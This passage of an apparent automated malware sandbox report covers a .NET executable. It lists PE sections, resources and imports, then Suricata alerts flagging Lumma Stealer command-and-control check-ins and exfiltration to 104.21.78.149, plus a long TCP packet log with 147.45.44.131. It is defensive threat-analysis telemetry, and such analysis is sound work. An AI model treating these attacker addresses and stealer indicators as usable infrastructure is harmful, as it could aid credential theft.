IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xa348	0xa400	9044b8111c9054687043466efccbf2c2	False	0.24018673780487804	data	3.9056812156184852	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xe000	0x5b0	0x600	c4e0313830c3e1cae6ac422e5cf1f45f	False	0.4186197916666667	data	4.137287324477428	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x10000	0xc	0x200	50e328932e35e54f33d1d8417285e696	False	0.044921875	data	0.08153941234324169	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xe090	0x320	data			0.42375
RT_MANIFEST	0xe3c0	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-12-11T10:45:03.721511+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49707	104.21.78.149	443	TCP
2024-12-11T10:45:04.422172+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.8	49707	104.21.78.149	443	TCP
2024-12-11T10:45:04.422172+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49707	104.21.78.149	443	TCP
2024-12-11T10:45:05.753648+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49708	104.21.78.149	443	TCP
2024-12-11T10:45:06.477400+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.8	49708	104.21.78.149	443	TCP
2024-12-11T10:45:06.477400+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49708	104.21.78.149	443	TCP
2024-12-11T10:45:07.915803+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49709	104.21.78.149	443	TCP
2024-12-11T10:45:09.842338+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49710	104.21.78.149	443	TCP
2024-12-11T10:45:12.022254+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49711	104.21.78.149	443	TCP
2024-12-11T10:45:14.263320+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49712	104.21.78.149	443	TCP
2024-12-11T10:45:14.988143+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.8	49712	104.21.78.149	443	TCP
2024-12-11T10:45:16.879410+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49713	104.21.78.149	443	TCP
2024-12-11T10:45:21.999225+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.8	49715	104.21.78.149	443	TCP
2024-12-11T10:45:22.736552+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.8	49715	104.21.78.149	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 11, 2024 10:44:59.016000986 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:44:59.135299921 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:44:59.135386944 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:44:59.135669947 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:44:59.254946947 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.402662992 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.402770996 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.402784109 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.402832031 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.403145075 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.403207064 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.403219938 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.403229952 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.403436899 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.404109001 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.404123068 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.404134035 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.404339075 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.522126913 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.522198915 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.522259951 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.594538927 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.594681978 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.594734907 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.598702908 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.598805904 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.598851919 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.607094049 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.607212067 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.607251883 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.615036964 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.615137100 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.615179062 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.623394012 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.623523951 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.623568058 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.631791115 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.631896973 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.631947041 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.640089989 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.640256882 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.640327930 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.648467064 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.648576021 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.648637056 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.656846046 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.656955957 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.657015085 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.665215969 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.665380955 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.665441036 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.673494101 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.673615932 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.673696995 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.714145899 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.760231018 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.786669016 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.786817074 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.786865950 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.789230108 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.789367914 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.789422989 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.794334888 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.794518948 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.794574976 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.799268007 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.799408913 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.799459934 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.804229975 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.804320097 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.804372072 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.809034109 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.809221983 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.809269905 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.816019058 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.816123009 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.816164017 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.821779013 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.821860075 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.821902037 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.824817896 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.824951887 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.824992895 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.828293085 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.828465939 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.828509092 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.833235025 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.833404064 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.833462954 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.837987900 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.838113070 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.838164091 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.842804909 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.842900991 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.842947960 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.847626925 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.847773075 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.847819090 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.852459908 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.852545977 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.852600098 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.857234955 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.857384920 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.857426882 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.862108946 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.862200975 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.862240076 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.866930008 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.867002964 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.867049932 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.871808052 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.871850014 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.871896029 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.879584074 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.879669905 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.879724026 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.906197071 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.906299114 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.906344891 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.908782005 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.908796072 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.908843994 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.978621960 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.978805065 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.978873014 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.980597019 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.980678082 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.980779886 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.983584881 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.983663082 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.983700991 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.987435102 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.987543106 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.987601042 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.991367102 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.991483927 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.991646051 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.995225906 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.995279074 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.995336056 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:00.998761892 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.998872042 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:00.998930931 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.002362013 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.002446890 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.002525091 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.005872965 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.006015062 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.006074905 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.009521008 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.009588957 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.009644985 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.012404919 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.012465954 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.012516975 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.015279055 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.015527010 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.015578032 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.018151045 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.018271923 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.018322945 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.021059990 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.021115065 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.021177053 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.023998976 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.024111986 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.024203062 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.026829958 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.026917934 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.026966095 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.029705048 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.029827118 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.029925108 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.032670021 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.032740116 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.032784939 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.034679890 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.034816027 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.034862041 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.036726952 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.036839962 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.036891937 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.038738966 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.038850069 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.038898945 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.040788889 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.040904999 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.040951014 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.042882919 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.042985916 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.043030024 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.044852972 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.044995070 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.045037985 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.046900034 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.047040939 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.047086000 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.048935890 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.049026012 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.049072027 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.050991058 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.051107883 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.051153898 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.053015947 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.053119898 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.053167105 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.055120945 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.055224895 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.055273056 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.057084084 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.057193041 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.057233095 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.059123039 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.059262037 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.059307098 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.170463085 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.170617104 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.170665979 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.171330929 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.171711922 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.171762943 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.171771049 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.173562050 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.173607111 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.173666954 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.175461054 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.175514936 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.175631046 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.177292109 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.177347898 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.177372932 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.179085016 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.179137945 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.179189920 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.180906057 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.180963993 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.181019068 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.182631969 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.182683945 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.182749033 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.184345961 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.184396982 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.184432030 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.186041117 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.186096907 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.186167002 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.187704086 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.187756062 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.187797070 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.189399958 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.189460039 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.189553976 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.191107988 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.191158056 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.191260099 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.192854881 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.192903042 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.192925930 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.194591045 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.194643974 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.194757938 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.196218014 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.196274042 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.196312904 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.197875977 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.197916985 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.197968960 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.199618101 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.199664116 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.199742079 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.201266050 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.201313019 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.201366901 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.202979088 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.203022003 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.203107119 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.204818964 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.204864025 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.204899073 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.206497908 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.206557989 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.206641912 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.208146095 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.208180904 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.208190918 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.210227966 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.210278988 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.210397005 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.213033915 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.213079929 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.213170052 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.215426922 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.215475082 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.215646982 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.216691017 CET	80	49706	147.45.44.131	192.168.2.8
Dec 11, 2024 10:45:01.216733932 CET	49706	80	192.168.2.8	147.45.44.131
Dec 11, 2024 10:45:01.216790915 CET	80	49706	147.45.44.131	192.168.2.8
